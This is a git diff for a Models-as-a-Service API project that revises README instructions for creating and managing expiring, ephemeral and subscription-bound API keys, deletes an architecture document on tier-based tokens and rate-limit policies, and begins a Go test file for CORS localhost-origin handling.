 ##### Ephemeral Tokens
 
@@ -181,34 +181,36 @@ TOKEN=$(echo $TOKEN_RESPONSE | jq -r .token)
 
 ##### API Keys
 
-The API uses hash-based API keys with OpenAI-compatible format (`sk-oai-*`). These keys support both permanent and expiring modes.
+The API uses hash-based API keys with OpenAI-compatible format (`sk-oai-*`). Keys expire after a configurable duration (default: 90 days via `API_KEY_MAX_EXPIRATION_DAYS`).
 
 ```shell
 HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')"
 
-# Create a permanent API key (no expiration)
+# Create an API key (defaults to API_KEY_MAX_EXPIRATION_DAYS, typically 90 days)
 API_KEY_RESPONSE=$(curl -sSk \
   -H "Authorization: Bearer $(oc whoami -t)" \
   -H "Content-Type: application/json" \
   -X POST \
   -d '{
-    "name": "my-permanent-key",
-    "description": "Production API key for my application"
+    "name": "my-api-key",
+    "description": "Production API key for my application",
+    "subscription": "simulator-subscription"
   }' \
   "${HOST}/maas-api/v1/api-keys")
 
 echo $API_KEY_RESPONSE | jq -r .
 API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key)
 
-# Create an expiring API key (90 days)
+# Create an API key with custom expiration (30 days)
 API_KEY_RESPONSE=$(curl -sSk \
   -H "Authorization: Bearer $(oc whoami -t)" \
   -H "Content-Type: application/json" \
   -X POST \
   -d '{
-    "name": "my-expiring-key",
-    "description": "90-day test key",
-    "expiresIn": "90d"
+    "name": "my-short-lived-key",
+    "description": "30-day test key",
+    "expiresIn": "30d",
+    "subscription": "simulator-subscription"
   }' \
   "${HOST}/maas-api/v1/api-keys")
 
@@ -216,19 +218,25 @@ echo $API_KEY_RESPONSE | jq -r .
 API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key)
 ```
 
+> [!NOTE]
+> Replace `simulator-subscription` with your `MaaSSubscription` metadata name. To rely on **auto-selection** instead, remove the `subscription` field; maas-api then picks the accessible subscription with the highest `spec.priority`.
+
 > [!IMPORTANT]
 > The plaintext API key is shown ONLY ONCE at creation time. Store it securely - it cannot be retrieved again.
 
 **Managing API Keys:**
 
 ```shell
-# List all your API keys
+# Search your API keys
 curl -sSk \
   -H "Authorization: Bearer $(oc whoami -t)" \
-  "${HOST}/maas-api/v1/api-keys" | jq .
+  -H "Content-Type: application/json" \
+  -X POST \
+  -d '{}' \
+  "${HOST}/maas-api/v1/api-keys/search" | jq .
 
 # Get specific API key by ID
-API_KEY_ID="<id-from-list>"
+API_KEY_ID="<id-from-search>"
 curl -sSk \
   -H "Authorization: Bearer $(oc whoami -t)" \
   "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" | jq .
@@ -243,6 +251,55 @@ curl -sSk \
 > [!NOTE]
 > API keys use hash-based storage (only SHA-256 hash stored, never plaintext). They are OpenAI-compatible (sk-oai-* format) and support optional expiration. API keys are stored in the configured database (see [Storage Configuration](#storage-configuration)) with metadata including creation date, expiration date, and status.
 
+##### Ephemeral API Keys
+
+Ephemeral keys are short-lived programmatic keys designed for temporary access scenarios. They differ from regular API keys in several ways:
+
+| Feature | Regular API Keys | Ephemeral API Keys |
+|---------|------------------|-------------------|
+| Default expiration | 90 days | 1 hour |
+| Maximum expiration | 90 days (configurable) | 1 hour (enforced) |
+| Name | Required | Optional (auto-generated if not provided) |
+| Shown in list/search | Yes | No (excluded by default) |
+| Use case | Long-term application access | Short-term programmatic access |
+
+```shell
+# Create an ephemeral key (1-hour default expiration, name auto-generated)
+API_KEY_RESPONSE=$(curl -sSk \
+  -H "Authorization: Bearer $(oc whoami -t)" \
+  -H "Content-Type: application/json" \
+  -X POST \
+  -d '{"ephemeral": true}' \
+  "${HOST}/maas-api/v1/api-keys")
+
+echo $API_KEY_RESPONSE | jq -r .
+API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key)
+
+# Create an ephemeral key with custom name and expiration (max 1hr)
+API_KEY_RESPONSE=$(curl -sSk \
+  -H "Authorization: Bearer $(oc whoami -t)" \
+  -H "Content-Type: application/json" \
+  -X POST \
+  -d '{
+    "ephemeral": true,
+    "name": "playground-session",
+    "expiresIn": "30m"
+  }' \
+  "${HOST}/maas-api/v1/api-keys")
+```
+
+To include ephemeral keys in search results, use the `includeEphemeral` filter:
+
+```shell
+# Search including ephemeral keys
+curl -sSk \
+  -H "Authorization: Bearer $(oc whoami -t)" \
+  -H "Content-Type: application/json" \
+  -X POST \
+  -d '{"filters": {"includeEphemeral": true}}' \
+  "${HOST}/maas-api/v1/api-keys/search" | jq .
+```
+
 ### Database Configuration
 
 maas-api uses PostgreSQL for persistent storage of API key metadata. The database connection is configured via a Kubernetes Secret.
@@ -252,16 +309,60 @@ maas-api uses PostgreSQL for persistent storage of API key metadata. The databas
 
 For production deployments, see the [Database Prerequisites](../docs/content/install/prerequisites.md#database-prerequisite) guide.
 
+#### Listing models with subscription filtering
+
+The `/v1/models` endpoint supports subscription filtering and aggregation. Use an **OpenShift token** or an **API key** in `Authorization: Bearer`. With a **user token**, optional `X-MaaS-Subscription` filters to one subscription when you have access to several. With an **API key**, the subscription is fixed at key mint time—no client `X-MaaS-Subscription` is needed for listing.
+
+    HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')"
+
+    # List models from all accessible subscriptions
+    curl ${HOST}/v1/models \
+        -H "Content-Type: application/json" \
+        -H "Authorization: Bearer $TOKEN" | jq .
+
+    # List models from a specific subscription
+    curl ${HOST}/v1/models \
+        -H "Content-Type: application/json" \
+        -H "Authorization: Bearer $TOKEN" \
+        -H "X-MaaS-Subscription: my-subscription" | jq .
+
+    # List models from the subscription bound to an API key
+    curl ${HOST}/v1/models \
+        -H "Content-Type: application/json" \
+        -H "Authorization: Bearer $API_KEY" | jq .
+
+**Subscription Aggregation**: When the same model (same ID and URL) is accessible via multiple subscriptions, it appears once in the response with an array of all subscriptions providing access:
+
+    {
+      "object": "list",
+      "data": [
+        {
+          "id": "model-name",
+          "url": "https://...",
+          "subscriptions": [
+            {"name": "subscription-a", "displayName": "Subscription A"},
+            {"name": "subscription-b", "displayName": "Subscription B"}
+          ]
+        }
+      ]
+    }
+
 #### Calling the model and hitting the rate limit
 
-Using model discovery:
+Inference requires an API key (mint with `POST /v1/api-keys` using your OpenShift token). Send **only** `Authorization: Bearer <api-key>`; subscription is taken from the key at mint time.
+
+Using model discovery (maas-api URL matches the [validation guide](../docs/content/install/validation.md); model `url` values come from the list response):
 
 ```shell
-HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')"
+CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
+MAAS_API="https://maas.${CLUSTER_DOMAIN}/maas-api"
+API_KEY=$(curl -sSk -H "Authorization: Bearer $(oc whoami -t)" -H "Content-Type: application/json" \
+  -X POST -d '{"name":"rate-limit-demo","subscription":"simulator-subscription"}' \
+  "${MAAS_API}/v1/api-keys" | jq -r .key)
 
-MODELS=$(curl ${HOST}/v1/models  \
+MODELS=$(curl -sSk "${MAAS_API}/v1/models"  \
     -H "Content-Type: application/json" \
-    -H "Authorization: Bearer $TOKEN" | jq . -r)
+    -H "Authorization: Bearer ${API_KEY}" | jq . -r)
 
 echo $MODELS | jq .
 MODEL_URL=$(echo $MODELS | jq -r '.data[0].url')
@@ -270,7 +371,7 @@ MODEL_NAME=$(echo $MODELS | jq -r '.data[0].id')
 for i in {1..16}
 do
 curl -sSk -o /dev/null -w "%{http_code}\n" \
-  -H "Authorization: Bearer $TOKEN" \
+  -H "Authorization: Bearer ${API_KEY}" \
   -d "{
         \"model\": \"${MODEL_NAME}\",
         \"prompt\": \"Not really understood prompt\",
diff --git a/maas-api/architecture.md b/maas-api/architecture.md
deleted file mode 100644
index 368ff326f..000000000
--- a/maas-api/architecture.md
+++ /dev/null
@@ -1,611 +0,0 @@
-# MaaS API Architecture
-
-## Overview
-
-The MaaS (Models as a Service) API provides a tier-based token management system for accessing AI models through KServe. It integrates with OpenShift authentication, Kuadrant policies, and Gateway API to deliver multi-tenant access control, rate limiting, and usage metrics for LLM inference services.
-
-## Key Features
-
-- **Tier-Based Access Control**: Users are assigned to tiers (free, premium, enterprise) based on Kubernetes group membership
-- **Short-Lived Token Issuance**: Self-service ephemeral tokens with configurable expiration
-- **Rate & Token Limiting**: Per-tier request and token consumption limits
-- **Model listing**: GET /v1/models lists models from **MaaSModelRef** CRs (when the MaaS controller is installed) or falls back to discovering KServe LLMInferenceServices. See [Model listing flow](../docs/content/configuration-and-management/model-listing-flow.md).
-- **Usage Metrics**: Real-time telemetry with user, tier, and model tracking
-- **Kubernetes-Native**: Leverages Service Accounts, RBAC, and TokenReview for authentication
-
-## Technology Stack
-
-- **Backend**: Go with Gin framework
-- **Authentication**: Kubernetes TokenReview API + OpenShift OAuth
-- **Authorization**: Kubernetes SubjectAccessReview (RBAC)
-- **Gateway**: OpenShift Gateway API implementation
-- **Policies**: Kuadrant (AuthPolicy, RateLimitPolicy, TokenRateLimitPolicy, TelemetryPolicy)
-- **Model Serving**: KServe LLMInferenceServices
-- **Metrics**: Prometheus via Limitador and TelemetryPolicy
-- **Rate Limiting**: Limitador (part of Kuadrant)
-
-## API Endpoint Reference
-
-| Endpoint              | Method | Purpose                                      | Request Body      | Response                    |
-|-----------------------|--------|----------------------------------------------|-------------------|-----------------------------|
-| `/health`             | GET    | Service health check                         | None              | Health status               |
-| `/v1/models`          | GET    | List available models (from MaaSModelRef CRs or LLMInferenceServices) | None              | OpenAI-compatible list      |
-| `/v1/api-keys`        | POST   | Create hash-based API key (sk-oai-*)         | `{"name", "description", "expiresIn"}` | API key (shown once) |
-| `/v1/api-keys`        | GET    | List all API keys for user                   | None              | Array of API key metadata   |
-| `/v1/api-keys/{id}`   | GET    | Get specific API key by ID                   | None              | API key metadata            |
-| `/v1/api-keys/{id}`   | DELETE | Revoke specific API key                      | None              | Revoked API key metadata (200 OK) |
-| `/v1/tiers/lookup`    | POST   | Lookup tier for user groups (internal)       | `{"groups"}`      | `{"tier", "displayName"}`   |
-| `/internal/v1/api-keys/validate` | POST | Validate API key (Authorino callback) | `{"key"}`         | `{"valid", "userId", "groups"}` |
-
-## Core Architecture Components
-
-### 1. MaaS API Service
-
-- **Language**: Go with Gin framework
-- **Port**: 8080
-- **Service Account**: `maas-api` with cluster-wide permissions
-- **Purpose**: Central API for token management and model discovery
-- **Features**:
-  - Ephemeral token generation via Kubernetes Service Account TokenRequest API
-  - Tier-based namespace and Service Account management
-  - Model list from MaaSModelRef CRs only
-  - Health checks and CORS support (debug mode)
-
-**Key Components**:
-- **Token Manager**: Creates/revokes Service Account tokens
-- **Token Reviewer**: Validates tokens via Kubernetes TokenReview API
-- **Tier Mapper**: Maps user groups to tiers using ConfigMap
-- **Model listing**: Lists **MaaSModelRef** CRs (when the MaaS controller is installed) to build GET /v1/models; falls back to discovering LLMInferenceServices and probing each model endpoint if MaaSModelRef listing is not available.
-
-### 2. Kuadrant Policy Engine
-
-**Deployed Components**:
-- **Authorino**: Authentication and authorization policy enforcement
-- **Limitador**: Rate limiting and token counting engine
-- **Kuadrant Operator**: Policy CRD management and synchronization
-
-**Policies Applied**:
-
-#### Gateway AuthPolicy
-
-- **Target**: `maas-default-gateway` (Gateway)
-- **Authentication**:
-  - Service Account tokens (JWT format: `eyJ...`) via `kubernetesTokenReview` (legacy)
-  - Hash-based API keys (OpenAI format: `sk-oai-...`) via HTTP callback to `/internal/v1/api-keys/validate`
-- **Metadata Enrichment**: Calls MaaS API `/v1/tiers/lookup` to determine user tier (cached for 300s)
-- **Authorization**:
-  - API key validation (checks key is valid and not revoked)
-  - Kubernetes SubjectAccessReview for model access (checks user can POST to specific LLMInferenceService)
-- **Identity Injection**: Adds `userid`, `tier`, and `keyId` to request context for downstream policies
-
-#### MaaS API AuthPolicy
-
-- **Target**: `maas-api-route` (HTTPRoute)
-- **Authentication**: OpenShift user tokens via `kubernetesTokenReview`
-- **Purpose**: Allows authenticated OpenShift users to issue tokens
-
-#### RateLimitPolicy
-
-- **Target**: `maas-default-gateway` (Gateway)
-- **Limits by Tier**:
-  - Free: 5 requests per 2 minutes
-  - Premium: 20 requests per 2 minutes
-  - Enterprise: 50 requests per 2 minutes
-- **Counter**: Per user (`auth.identity.userid`)
-
-#### TokenRateLimitPolicy
-
-- **Target**: `maas-default-gateway` (Gateway)
-- **Limits by Tier** (tokens per minute):
-  - Free: 100 tokens/min
-  - Premium: 50,000 tokens/min
-  - Enterprise: 100,000 tokens/min
-- **Counter**: Per user (`auth.identity.userid`)
-- **Token Extraction**: Automatically reads `usage.total_tokens` from response body
-
-#### TelemetryPolicy
-
-- **Target**: `maas-default-gateway` (Gateway)
-- **Metrics Labels**:
-  - `model`: Extracted from response body (`/model`)
-  - `tier`: From identity context
-  - `user`: From identity context
-- **Purpose**: Export usage metrics to Prometheus via Limitador
-
-### 3. Gateway API and Routing
-
-Two gateways are deployed:
-
-1. **openshift-ai-inference**:
-   - Basic HTTP gateway for non-MaaS model access
-   - No authentication or rate limiting
-   - Allows direct access to models
-
-2. **maas-default-gateway**:
-   - Managed MaaS gateway with full policy enforcement
-   - Hostname: `maas.${CLUSTER_DOMAIN}`
-   - Listeners: HTTP (80) and HTTPS (443)
-   - Policies: Auth, RateLimit, TokenRateLimit, Telemetry
-
-**HTTPRoute for MaaS API**:
-- `/v1/models` → `maas-api:8080` (OpenAI-compatible endpoint at root)
-- `/maas-api/*` → `maas-api:8080` (with prefix rewrite to `/`)
-
-### 4. Tier Management
-
-The tier configuration defines three tiers with increasing levels of access:
-
-- **free** (level 0): Default for all authenticated users via `system:authenticated` group
-- **premium** (level 1): For users in premium groups
-- **enterprise** (level 2): Highest tier for enterprise/admin groups
-
-**Tier Resolution Logic**:
-1. User groups are extracted from OpenShift token
-2. Tiers are sorted by level (highest first)
-3. First matching tier based on group membership wins
-4. Service Account group (`system:serviceaccounts:<tier-namespace>`) is automatically added to tier groups
-
-**Tier Namespace Convention**:
-- Format: `{instance-name}-tier-{tier-name}`
-- Example: `maas-default-gateway-tier-free`
-- Namespaces are created automatically when first token is issued
-
-### 5. KServe Model Services
-
-**Supported CRDs**:
-- **LLMInferenceService** (`serving.kserve.io/v1alpha1`)
-
-**Model Discovery**:
-- Queries all namespaces for LLMInferenceServices
-- Extracts model ID from `spec.model.name` or falls back to `metadata.name`
-- Checks readiness via status conditions
-- Returns OpenAI-compatible model list with URL and ready status
-
-**Model URL Resolution**:
-1. Primary: `status.url`
-2. Fallback: First URL in `status.addresses[]`
-
-### 6. Token Lifecycle
-
-**Service Account-Based Token Architecture**:
-
-The system uses Kubernetes Service Account tokens as the primary authentication mechanism. Each user gets a dedicated Service Account in their tier namespace.
-
-## Token Issuance Workflow
-
-```mermaid
-sequenceDiagram
-    participant User
-    participant Gateway as Gateway API
-    participant Authorino
-    participant MaaS as MaaS API
-    participant TierMapper as Tier Mapper
-    participant K8s as Kubernetes API
-
-    User->>Gateway: POST /maas-api/v1/tokens<br/>Authorization: Bearer {openshift-token}
-    Gateway->>Authorino: Enforce MaaS API AuthPolicy
-    Authorino->>K8s: TokenReview (validate OpenShift token)
-    K8s-->>Authorino: User identity (username, groups)
-    Authorino->>Gateway: Authenticated
-    Gateway->>MaaS: Forward request with user context
-
-    Note over MaaS,TierMapper: Determine User Tier
-    MaaS->>TierMapper: GetTierForGroups(user.groups)
-    TierMapper->>K8s: Get ConfigMap(tier-to-group-mapping)
-    K8s-->>TierMapper: Tier configuration
-    TierMapper-->>MaaS: User tier (e.g., "premium")
-
-    Note over MaaS,K8s: Ensure Tier Resources
-    MaaS->>K8s: Create Namespace({instance}-tier-{tier}) if needed
-    MaaS->>K8s: Create ServiceAccount({username-hash}) if needed
-
-    Note over MaaS,K8s: Generate Token
-    MaaS->>K8s: CreateToken(namespace, SA name, TTL)
-    K8s-->>MaaS: TokenRequest with token and expiration
-
-    MaaS-->>User: {<br/>  "token": "...",<br/>  "expiration": "4h",<br/>  "expiresAt": 1234567890<br/>}
-```
-
-### Token Issuance Details
-
-**Step 1: Authentication**
-- User authenticates with OpenShift token (`oc whoami -t`)
-- MaaS API AuthPolicy validates token via Kubernetes TokenReview
-- User context (username, groups, UID) is extracted
-
-**Step 2: Tier Determination**
-- User groups are matched against tier configuration
-- Highest level tier wins (enterprise > premium > free)
-- Projected Service Account group is added: `system:serviceaccounts:{tier-namespace}`
-
-**Step 3: Resource Provisioning**
-- Tier namespace is created if missing: `{instance}-tier-{tier}`
-- Service Account is created if missing: `{username-sanitized}-{hash}`
-  - Username sanitization: lowercase, replace invalid chars with `-`, max 63 chars
-  - Hash suffix prevents collisions (first 8 chars of SHA1)
-- Labels applied for tracking tier and instance association
-
-**Step 4: Token Generation**
-- Uses Kubernetes TokenRequest API (`ServiceAccounts().CreateToken()`)
-- Audience: `{instance}-sa`
-- TTL: User-specified (default: 4 hours)
-- Returns token, expiration duration, and Unix timestamp
-
-### Token Revocation Workflow
-
-```mermaid
-sequenceDiagram
-    participant User
-    participant Gateway as Gateway API
-    participant Authorino
-    participant MaaS as MaaS API
-    participant K8s as Kubernetes API
-
-    User->>Gateway: DELETE /maas-api/v1/tokens<br/>Authorization: Bearer {openshift-token}
-    Gateway->>Authorino: Enforce MaaS API AuthPolicy
-    Authorino->>K8s: TokenReview (validate OpenShift token)
-    K8s-->>Authorino: User identity
-    Authorino->>Gateway: Authenticated
-    Gateway->>MaaS: Forward request with user context
-
-    Note over MaaS,K8s: Revoke All Tokens
-    MaaS->>K8s: Delete ServiceAccount({username-hash})
-    MaaS->>K8s: Recreate ServiceAccount({username-hash})
-
-    Note right of K8s: All existing tokens<br/>are invalidated
-
-    MaaS-->>User: 204 No Content
-```
-
-**Revocation Mechanism**:
-- Kubernetes doesn't support individual token revocation
-- Solution: Delete and recreate the Service Account
-- All tokens issued from that Service Account become invalid immediately
-- New Service Account can immediately issue new tokens
-
-## Model Access Workflow
-
-```mermaid
-sequenceDiagram
-    participant User
-    participant Gateway as Gateway API
-    participant Authorino
-    participant MaaS as MaaS API
-    participant Limitador
-    participant Model as KServe Model
-
-    Note over User: 1. Obtain Token
-    User->>Gateway: POST /maas-api/v1/tokens<br/>Authorization: Bearer {openshift-token}
-    Gateway->>MaaS: Route to MaaS API
-    MaaS-->>User: {token: "...", expiration: "4h"}
-
-    Note over User: 2. Access Model
-    User->>Gateway: POST /{namespace}/{model}/v1/chat/completions<br/>Authorization: Bearer {sa-token}
-
-    Note over Gateway,Authorino: Gateway AuthPolicy Enforcement
-    Gateway->>Authorino: Validate request
-    Authorino->>Authorino: TokenReview (validate SA token)
-    Authorino->>MaaS: POST /v1/tiers/lookup<br/>{groups: [...]}
-    MaaS-->>Authorino: {tier: "premium"}
-    Authorino->>Authorino: SubjectAccessReview<br/>(check RBAC for model access)
-    Authorino->>Authorino: Inject identity context:<br/>{userid: "user", tier: "premium"}
-    Authorino-->>Gateway: Authorized
-
-    Note over Gateway,Limitador: Rate Limiting
-    Gateway->>Limitador: Check RateLimit (premium: 20/2m)
-    Limitador-->>Gateway: Allowed
-    Gateway->>Limitador: Check TokenRateLimit (premium: 50k/min)
-    Limitador-->>Gateway: Allowed
-
-    Gateway->>Model: Forward request
-    Model-->>Gateway: Response {usage: {total_tokens: 150}}
-
-    Note over Gateway,Limitador: Record Usage
-    Gateway->>Limitador: Record 150 tokens for user
-    Gateway->>Limitador: Export metrics:<br/>{user, tier, model}
-
-    Gateway-->>User: Model response
-```
-
-### Model Access Details
-
-**Step 1: Token-Based Authentication**
-- Gateway extracts Bearer token from Authorization header
-- Authorino performs TokenReview to validate Service Account token
-- Token audience is checked: `maas-default-gateway-sa`
-- User ID is normalized from full SA name: `system:serviceaccount:{ns}:{name}` → `{name}`
-
-**Step 2: Tier Lookup with Caching**
-- Authorino calls MaaS API: `POST /v1/tiers/lookup` with user groups
-- User groups include the tier-specific SA group: `system:serviceaccounts:{tier-namespace}`
-- Response is cached for 300 seconds (5 minutes) per username
-- Tier is added to identity metadata: `auth.identity.tier`
-
-**Step 3: Authorization via RBAC**
-- Authorino performs Kubernetes SubjectAccessReview
-- Checks if user can POST to specific LLMInferenceService
-- Resource attributes:
-  - Group: `serving.kserve.io`
-  - Resource: `llminferenceservices`
-  - Namespace: Extracted from request path (`/{namespace}/{model}/...`)
-  - Name: Extracted from request path
-  - Verb: `post`
-
-**Step 4: Rate Limiting**
-- Limitador checks request count against tier limit
-- Counter key: `auth.identity.userid`
-- Returns 429 if limit exceeded
-
-**Step 5: Token Rate Limiting**
-- Pre-checks estimated token usage (if available)
-- Actual token usage is recorded from response body: `usage.total_tokens`
-- Counter key: `auth.identity.userid`
-- Returns 429 if token limit exceeded
-
-**Step 6: Telemetry Export**
-- Limitador exports metrics with labels:
-  - `model`: Extracted from response body JSON (`/model`)
-  - `tier`: From auth identity context
-  - `user`: From auth identity context
-- Metrics available in Prometheus format at Limitador metrics endpoint
-
-## Detailed Component Workflows
-
-### Tier Lookup Endpoint
-
-**Purpose**: Internal API for Gateway AuthPolicy to determine user tier
-
-**Endpoint**: `POST /v1/tiers/lookup`
-
-**Request**:
-```json
-{
-  "groups": [
-    "system:serviceaccounts:maas-default-gateway-tier-premium",
-    "system:authenticated",
-    "premium-group"
-  ]
-}
-```
-
-**Response**:
-```json
-{
-  "tier": "premium",
-  "displayName": "Premium Tier"
-}
-```
-
-**Implementation**:
-1. Receive user groups in request body
-2. Load tier configuration from ConfigMap `tier-to-group-mapping`
-3. Sort tiers by level (highest first)
-4. Find first tier containing any of the user groups
-5. Return tier info (name and displayName) or 404 if no match
-
-**Error Handling**:
-- 400: Invalid request body
-- 404: No tier found for any group
-- 500: Failed to load tier configuration
-
-### Model listing (GET /v1/models)
-
-**Endpoint**: `GET /v1/models` — Returns an OpenAI-compatible list of available models.
-
-**Primary flow (MaaSModelRef)**  
-When the MaaS controller is installed and the API can list **MaaSModelRef** CRs (maas.opendatahub.io) in its namespace:
-
-1. The API lists all MaaSModelRef resources in the configured namespace.
-2. For each MaaSModelRef it maps: **id** = `metadata.name`, **url** = `status.endpoint`, **ready** = (`status.phase == "Ready"`), plus **created** / **owned_by** from metadata.
-3. No per-model HTTP calls are made; the controller has already reconciled status from the underlying LLMInferenceService and HTTPRoute.
-
-If the MaaSModelRef lister is not configured or listing fails, the API returns an empty list or an error. See [Model listing flow](../docs/content/configuration-and-management/model-listing-flow.md) for details.
-
-**Response format** (OpenAI-compatible):
-```json
-{
-  "object": "list",
-  "data": [
-    {
-      "id": "facebook-opt-125m-simulated",
-      "object": "model",
-      "created": 1703001234,
-      "owned_by": "opendatahub",
-      "url": "https://maas.example.com/llm/facebook-opt-125m-simulated",
-      "ready": true
-    }
-  ]
-}
-```
-
-### Service Account Name Sanitization
-
-**Problem**: Kubernetes usernames can contain characters invalid for Service Account names
-
-**Examples**:
-- Email: `user@example.com` (contains `@`, `.`)
-- LDAP DN: `CN=User,OU=Users,DC=example,DC=com` (contains `=`, `,`)
-
-**Sanitization Algorithm**:
-1. Convert to lowercase
-2. Replace all invalid characters (`[^a-z0-9-]`) with `-`
-3. Collapse consecutive dashes to single dash
-4. Trim leading/trailing dashes
-5. Append 8-character SHA1 hash of original username (collision prevention)
-6. Truncate to 63 characters total (Kubernetes limit)
-
-**Examples**:
-- `user@example.com` → `user-example-com-a1b2c3d4`
-- `CN=User,OU=Users` → `cn-user-ou-users-e5f6g7h8`
-
-## Security Considerations
-
-### Authentication Security
-
-1. **Two-Stage Authentication**:
-   - Stage 1: OpenShift token validates user identity (for token issuance)
-   - Stage 2: Service Account token authenticates model access
-
-2. **Token Scoping**:
-   - Service Account tokens are scoped to specific audience: `{instance}-sa`
-   - Tokens cannot be used outside the MaaS gateway context
-
-3. **Short-Lived Tokens**:
-   - Default: 4 hours
-   - Configurable per request
-   - Automatic expiration enforced by Kubernetes
-
-4. **Revocation**:
-   - All user tokens can be revoked via Service Account recreation
-   - No persistent token storage (stateless)
-
-### Authorization Security
-
-1. **Kubernetes RBAC Integration**:
-   - Model access requires Kubernetes RBAC permissions
-   - Fine-grained control per namespace and model name
-
-2. **Tier-Based Isolation**:
-   - Each tier has dedicated namespace
-   - Service Accounts cannot cross tier boundaries
-   - Network policies can further isolate tiers
-
-3. **Identity Propagation**:
-   - User identity is preserved through all policy layers
-   - Authorino injects normalized user ID into request context
-
-### Rate Limiting Security
-
-1. **Multi-Level Protection**:
-   - Request-based limits prevent API abuse
-   - Token-based limits prevent cost-based attacks
-
-2. **Per-User Accounting**:
-   - Limits enforced per user ID (from Service Account name)
-   - Prevents shared token abuse
-
-3. **Tier Enforcement**:
-   - Limits cannot be bypassed by switching tokens
-   - Tier is re-evaluated on each request via cached lookup
-
-## Metrics and Observability
-
-### Available Metrics
-
-**Source**: Limitador (exposed on port 8080 at `/metrics`)
-
-**Metric Types**:
-1. **Request Counters**:
-   - `authorized_calls` - Number of requests allowed (not rate-limited)
-   - `limited_calls` - Number of requests denied due to rate limiting
-   - Labels: `user`, `tier`, `model`, `limitador_namespace`
-
-2. **Token Counters**:
-   - `authorized_hits` - Total tokens consumed (extracted from `usage.total_tokens` in model responses)
-   - Labels: `user`, `tier`, `model`, `limitador_namespace`
-
-3. **Labels via TelemetryPolicy**:
-   - `user`: User identifier (extracted from `auth.identity.userid`)
-   - `tier`: User tier (extracted from `auth.identity.tier`)
-   - `model`: Model name (extracted from request path)
-
-### Monitoring Setup
-
-**Prometheus ServiceMonitor**:
-- Scrapes Limitador metrics endpoint
-- Interval: 30 seconds
-- Labels for Grafana dashboards
-
-**Access Metrics**:
-```bash
-# Port-forward Limitador
-kubectl port-forward -n kuadrant-system svc/limitador-limitador 8080:8080
-
-# Query metrics
-curl http://localhost:8080/metrics | grep -E '(authorized_hits|authorized_calls|limited_calls)'
-```
-
-## Deployment Architecture
-
-### Namespace Organization
-
-```
-openshift-ingress/
-├── Gateway: maas-default-gateway
-├── Gateway: openshift-ai-inference
-├── AuthPolicy: gateway-auth-policy
-├── RateLimitPolicy: gateway-rate-limits
-├── TokenRateLimitPolicy (gateway-level)
-└── TelemetryPolicy: user-group
-
-maas-api/
-├── Deployment: maas-api
-├── Service: maas-api
-├── ServiceAccount: maas-api (with cluster permissions)
-├── HTTPRoute: maas-api-route
-├── AuthPolicy: maas-api-auth-policy
-└── ConfigMap: tier-to-group-mapping
-
-kuadrant-system/
-├── Deployment: authorino
-├── Deployment: limitador
-└── Deployment: kuadrant-operator
-
-{instance}-tier-free/       (created dynamically)
-├── ServiceAccount: user1-a1b2c3d4
-├── ServiceAccount: user2-e5f6g7h8
-└── ...
-
-{instance}-tier-premium/    (created dynamically)
-└── ServiceAccount: user3-i9j0k1l2
-
-{instance}-tier-enterprise/ (created dynamically)
-└── ServiceAccount: admin1-m3n4o5p6
-```
-
-### RBAC Requirements
-
-**MaaS API Service Account Permissions**:
-
-The MaaS API requires cluster-level permissions for:
-- **Token management**: Create, list, get, and delete Service Accounts and Service Account tokens
-- **Namespace management**: Create, list, get namespaces for tier isolation
-- **Authentication**: Create TokenReviews to validate user tokens
-- **Model discovery**: List and get LLMInferenceServices across all namespaces
-- **Tier configuration**: Read ConfigMaps for tier-to-group mapping
-
-**User Model Access RBAC**:
-
-Users access models through their tier-specific Service Account. Access is granted via RoleBindings that bind tier groups to roles with POST permissions on LLMInferenceService resources.
-
-Example tier-based access pattern:
-- Subject: Group `system:serviceaccounts:maas-default-gateway-tier-premium`
-- Namespace: `models-namespace`
-- Resource: `llminferenceservices.serving.kserve.io`
-- Verb: `post`
-
-## Configuration Reference
-
-### Environment Variables
-
-**MaaS API Deployment**:
-- `NAMESPACE`: Namespace where MaaS API is deployed (from fieldRef)
-- `PORT`: HTTP server port (default: `8080`)
-- `DEBUG_MODE`: Enable CORS and debug logging (default: `false`)
-
-### Tier Configuration
-
-**ConfigMap**: `tier-to-group-mapping` (namespace: `maas-api`)
-
-The tier configuration uses a list structure with the following fields per tier:
-
-**Tier Fields**:
-- `name`: Tier identifier (used in namespace naming and policy matching)
-- `displayName`: Optional UI-friendly label (falls back to `name` if not set)
-- `level`: Priority integer (higher wins in case of multiple group matches)
-- `groups`: Array of Kubernetes groups that belong to this tier
-
-**Special Groups**:
-- `system:authenticated`: Default group for all authenticated users (typically assigned to free tier)
-- `system:serviceaccounts:{tier-namespace}`: Automatically added for each tier to enable tier-based routing
-
diff --git a/maas-api/cmd/cors_test.go b/maas-api/cmd/cors_test.go
new file mode 100644
index 000000000..db2e3012b
--- /dev/null
+++ b/maas-api/cmd/cors_test.go
@@ -0,0 +1,175 @@
+package main
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/gin-contrib/cors"
+	"github.com/gin-gonic/gin"
+	"github.com/stretchr/testify/assert"
+)
+
+func TestIsLocalhostOrigin(t *testing.T) {
+	tests := []struct {
+		name   string
+		origin string
+		want   bool
+	}{
+		{name: "http localhost with port", origin: "http://localhost:3000", want: true},
+		{name: "https localhost with port", origin: "https://localhost:8443", want: true},
+		{name: "http 127.0.0.1 with port", origin: "http://127.0.0.1:8080", want: true},
+		{name: "https 127.0.0.1 with port", origin: "https://127.0.0.1:443", want: true},
+		{name: "http localhost default port", origin: "http://localhost", want: true},
+		{name: "https localhost default port", origin: "https://localhost", want: true},
+		{name: "http 127.0.0.1 default port", origin: "http://127.0.0.1", want: true},
+		{name: "https 127.0.0.1 default port", origin: "https://127.0.0.1", want: true},
+		{name: "loopback range 127.0.0.2", origin: "http://127.0.0.2:8080", want: true},
